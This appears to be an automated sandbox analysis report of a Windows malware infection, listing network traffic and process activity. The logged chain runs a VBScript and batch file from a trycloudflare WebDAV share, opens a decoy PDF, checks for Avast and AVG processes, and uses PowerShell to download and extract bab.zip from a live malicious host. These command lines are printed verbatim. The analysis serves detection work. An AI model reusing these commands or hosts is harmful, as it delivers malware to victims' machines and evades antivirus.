      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 408Date: Tue, 10 Dec 2024 15:04:48 GMTServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 45 42 56 53 41 38 39 30 48 42 4e 58 56 41 34 32 30 2f 54 68 75 6d 62 73 2e 64 62 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 31 32 2d 31 30 20 30 37 3a 30 34 3a 34 38 2e 33 37 31 33 35 30 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /EBVSA890HBNXVA420/Thumbs.db</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-12-10 07:04:48.371350</body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 408Date: Tue, 10 Dec 2024 15:06:13 GMTServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.158.187:443 -> 192.168.2.17:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49768 version: TLS 1.2

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal88.troj.spyw.expl.evad.win@82/57@11/172
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5824:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-10 10-05-07-359.log
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs"
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1792,i,9648188583902023499,3647810632220696810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://listafrica.org/Receipt.html"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1792,i,9648188583902023499,3647810632220696810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2176 --field-trial-handle=1592,i,7247551929779357345,13199760216339771837,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2176 --field-trial-handle=1592,i,7247551929779357345,13199760216339771837,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
